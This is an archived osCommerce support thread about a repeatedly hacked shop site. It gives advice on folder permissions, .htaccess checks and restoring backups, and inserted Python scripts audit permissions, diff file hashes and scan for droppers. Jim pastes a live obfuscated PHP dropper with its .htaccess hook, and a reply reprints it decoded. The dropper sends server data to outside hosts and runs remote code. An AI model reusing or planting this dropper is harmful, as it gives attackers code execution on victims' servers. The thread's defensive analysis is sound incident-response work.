
osCommerce


Site getting Hacked


Forestshopkeeper

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.

Thanks

Jim

 

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.


Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


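A worked example, added here and not taken from this thread or from the osCommerce code, of the 755/644 audit the two replies above recommend. It walks a web root, reports every directory or file whose mode carries bits beyond rwxr-xr-x (directories) or rw-r--r-- (files), so a 777 images folder or a 666 file shows up, and then clamps them. The sample tree is constructed inside the script; point audit_permissions and harden_permissions at a real document root to use them.

```python
import os
import stat
import tempfile

DIR_MAX = 0o755   # rwxr-xr-x: owner writes, web server only reads/traverses
FILE_MAX = 0o644  # rw-r--r--: owner writes, everyone else reads


def _entries(dirpath, dirs, files, dir_mode, file_mode):
    """Yield (full path, allowed mode) for each child of one os.walk() step."""
    for name in dirs:
        yield os.path.join(dirpath, name), dir_mode
    for name in files:
        yield os.path.join(dirpath, name), file_mode


def audit_permissions(root):
    """Return sorted (relative path, octal mode) for entries with bits beyond the limit."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for full, limit in _entries(dirpath, dirs, files, DIR_MAX, FILE_MAX):
            if os.path.islink(full):
                continue  # the link's own mode is meaningless; audit its target separately
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode & ~limit:  # any bit set that the limit does not allow (e.g. group/other write)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, oct(mode)))
    return sorted(findings)


def harden_permissions(root, dir_mode=DIR_MAX, file_mode=FILE_MAX):
    """Set every directory and file under root to the given modes; return how many changed."""
    changed = 0
    for dirpath, dirs, files in os.walk(root):
        for full, target in _entries(dirpath, dirs, files, dir_mode, file_mode):
            if os.path.islink(full):
                continue
            if stat.S_IMODE(os.lstat(full).st_mode) != target:
                os.chmod(full, target)
                changed += 1
    return changed


def build_sample_tree():
    """Constructed web root with the 777 images folder described in the thread."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php // constructed placeholder\n")
    with open(os.path.join(root, "images", "logo.gif"), "w") as f:
        f.write("constructed placeholder\n")
    # the weak settings: world-writable upload folder and a world-writable file inside it
    os.chmod(os.path.join(root, "images"), 0o777)
    os.chmod(os.path.join(root, "images", "logo.gif"), 0o666)
    # the settings the replies recommend
    os.chmod(os.path.join(root, "includes"), 0o755)
    os.chmod(os.path.join(root, "index.php"), 0o644)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("before:", audit_permissions(root))
    print("changed:", harden_permissions(root))
    print("after:", audit_permissions(root))
```

The audit uses lstat and skips symlinks so a link planted inside the web root cannot make the script chmod something outside it; the file-mode clamp also drops any execute bit, which is what you want for a folder that should only ever hold images.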

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.


Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim


Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.

Thanks. I am working on the mods. I set the folders at 755. Files are 644.

Jim


After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Thanks for the info.

Jim


Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777

Jim


If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

 

Either that or get your hosting company to sort out their security.

 

Vger


Recheck your images folder for hack PHP files:

 

019667.php      23-May-2008 22:30   1k
1019667.php     24-Aug-2008 01:55   1k
19667.php       20-Mar-2008 02:59   1k


I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755.

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php.

 

Good luck

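An added example, not from this thread or from osCommerce, for the two checks recommended in the last two replies: rechecking the images folder for script files that have no business there, reading every .htaccess for directives that route requests into a .php file (ErrorDocument, AddHandler, SetHandler, RewriteRule, auto_prepend_file), and comparing the whole tree against a known-good SHA-256 manifest so edited or newly dropped files stand out even when their names look ordinary. The site layout, file names and the compromise it simulates are all constructed for the demonstration; the manifest approach assumes you can take the snapshot from a clean deployment, which is the same point the reply makes about keeping a local master copy.

```python
import hashlib
import os
import re
import tempfile

# Extensions Apache commonly hands to an interpreter; none belong in an images folder.
SCRIPT_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".cgi", ".pl"}

# .htaccess directives that can send a request into a script file.
HTACCESS_SUSPECT = re.compile(
    r"^\s*(?:ErrorDocument|AddHandler|AddType|SetHandler|RewriteRule|"
    r"php_value\s+auto_(?:prepend|append)_file)\b[^\n]*\.(?:php\d?|phtml)\b",
    re.IGNORECASE | re.MULTILINE,
)


def _rel(full, root):
    return os.path.relpath(full, root).replace(os.sep, "/")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative path, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[_rel(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(known_good, current):
    """Files that appeared, changed or vanished since the known-good snapshot."""
    return {
        "added": sorted(p for p in current if p not in known_good),
        "modified": sorted(p for p in current if p in known_good and current[p] != known_good[p]),
        "removed": sorted(p for p in known_good if p not in current),
    }


def find_scripts_in_upload_dir(root, upload_dir="images"):
    """Script files inside a directory that should only ever hold static content."""
    hits = []
    for dirpath, _dirs, files in os.walk(os.path.join(root, upload_dir)):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                hits.append(_rel(os.path.join(dirpath, name), root))
    return sorted(hits)


def check_htaccess(root):
    """(relative path, offending directive) for every .htaccess line that targets a script."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        full = os.path.join(dirpath, ".htaccess")
        with open(full, encoding="utf-8", errors="replace") as f:
            for m in HTACCESS_SUSPECT.finditer(f.read()):
                findings.append((_rel(full, root), m.group(0).strip()))
    return findings


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(data)


def build_clean_site():
    """Constructed stand-in for a freshly deployed shop; returns its root."""
    root = tempfile.mkdtemp(prefix="shop-")
    _write(root, "index.php", "<?php require 'includes/application_top.php'; ?>\n")
    _write(root, "includes/application_top.php", "<?php // constructed placeholder\n")
    _write(root, "images/logo.gif", "GIF89a constructed placeholder\n")
    _write(root, "admin/backups/.htaccess", "Options -Indexes\n")
    return root


def simulate_compromise(root):
    """Constructed tampering of the kind the thread describes: a dropped script in images,
    an edited index.php, and a 404 handler in .htaccess pointed at a script (rogue.php is
    a placeholder name)."""
    _write(root, "images/19667.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
    _write(root, "index.php", "<?php require 'includes/application_top.php'; /* edited */ ?>\n")
    _write(root, "admin/backups/.htaccess",
           "Options -MultiViews\nErrorDocument 404 /admin/backups/rogue.php\n")


if __name__ == "__main__":
    site = build_clean_site()
    snapshot = build_manifest(site)      # take this from the clean deployment and keep it off-server
    simulate_compromise(site)
    print(diff_manifest(snapshot, build_manifest(site)))
    print(find_scripts_in_upload_dir(site))
    print(check_htaccess(site))
```

Keep the manifest somewhere the web server cannot write to; a snapshot stored inside the document root can be edited along with everything else. The manifest diff is what catches the case the reply warns about, an existing file such as index.php quietly edited to re-open access after the obvious dropped files are deleted.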

They look like the same type of hack that got me last March.

 

If so, it's not a destructive or information-stealing type of hack.

 

It's a "pay per click" scam.

 

They stick these bogus PHP files around, then seed search engines with links to them, then just sit back and rake in the dough (so I've been told).

 

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

 

Just be sure all the folder permissions are no higher than 755 and keep an eye on things for a while.

 

If no more hack files show up, you should be OK.

 

By the way, better check your admin folder too, especially your backups folder for your database.

 

They got me there, too.

:blush:


I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755.

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php.

 

Good luck

I am looking at some .htaccess files in my admin folder:

 

This script is in a file called 220009.php

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

 

This is what is in the .htaccess file in my backups folder

 

Options -MultiViews

ErrorDocument 404 //admin/backups/220009.php

 

 

In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders.

 

What else can I do?

Jim


Both of the files you posted about in the backups folder are bad. Delete them.


I can't tell you what it does because the main payload(s) rely on something from another server.

 

All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

 

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>

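An added example, not from this thread: a small triage script for the dropper pattern decoded in the reply above. It scores a PHP source on the indicators visible in that file (error reporting silenced, base64 literals fed to base64_decode, include/eval driven by decoded strings, request metadata base64-encoded for sending away) and reassembles the remote URLs from the base64 literals, so an analyst can see where the file phones home without ever executing it. SAMPLE_PHP is a condensed copy of the script quoted earlier in the thread, with most of the $_SERVER lookups dropped; the weights are my own choice.

```python
import base64
import re

# Constructed sample: a condensed copy of the dropper quoted in this thread
# (same base64 literals and include/eval structure, most $_SERVER lookups removed).
SAMPLE_PHP = r'''<? error_reporting(0);$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$str=base64_encode($a).".$s.";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>'''

# (description, pattern, weight): the score is the sum of weights for patterns present.
INDICATORS = [
    ("error reporting silenced", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
    ("base64 literal decoded at runtime", re.compile(r"base64_decode\s*\(\s*['\"]"), 2),
    ("include/require built from a decoded string",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*base64_decode"), 3),
    ("eval of fetched content", re.compile(r"\beval\s*\(\s*file_get_contents"), 3),
    ("request metadata base64-encoded", re.compile(r"base64_encode\s*\(\s*\$\w+\s*\)"), 1),
]

B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# scheme literal concatenated with host literal, the construction used in the quoted script
B64_PAIR = re.compile(
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\.\s*"
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
FULL_URL = re.compile(r"^https?://[^/\s]+")


def _decode(lit):
    try:
        return base64.b64decode(lit, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable:%s>" % lit


def decode_literals(src):
    """Plaintext of every base64 literal handed to base64_decode(), in source order."""
    return [_decode(lit) for lit in B64_LITERAL.findall(src)]


def remote_urls(src):
    """URLs the script contacts: scheme+host pairs first, then standalone full URLs."""
    urls = [_decode(a) + _decode(b) for a, b in B64_PAIR.findall(src)]
    urls += [d for d in decode_literals(src) if FULL_URL.match(d)]
    return urls


def triage(src):
    """Score one PHP source and list the indicators and remote URLs found in it."""
    hits = [(desc, w) for desc, rx, w in INDICATORS if rx.search(src)]
    return {
        "score": sum(w for _, w in hits),
        "indicators": [desc for desc, _ in hits],
        "remote_urls": remote_urls(src),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PHP), indent=2))
```

Run triage() over every .php file that a manifest diff reports as added or modified: ordinary application code scores zero, the dropper scores on every indicator, and the decoded host names give you something to block at the firewall and search for in the server's outbound logs. It is a heuristic, so a file obfuscated some other way will slip past it; the manifest diff is the check that does not depend on the attacker's style.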

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

No, no. I would not delete and reinstall. It would be easier to manually inspect every file in every folder.

 

I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace.

 

IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection.

 

Unfortunately, some people modify the files live on the server and don't have local files. Those that do back up (i.e. download a full set of files from the server) have a backup of files that could have been infected.


Archived

This topic is now archived and is closed to further replies.
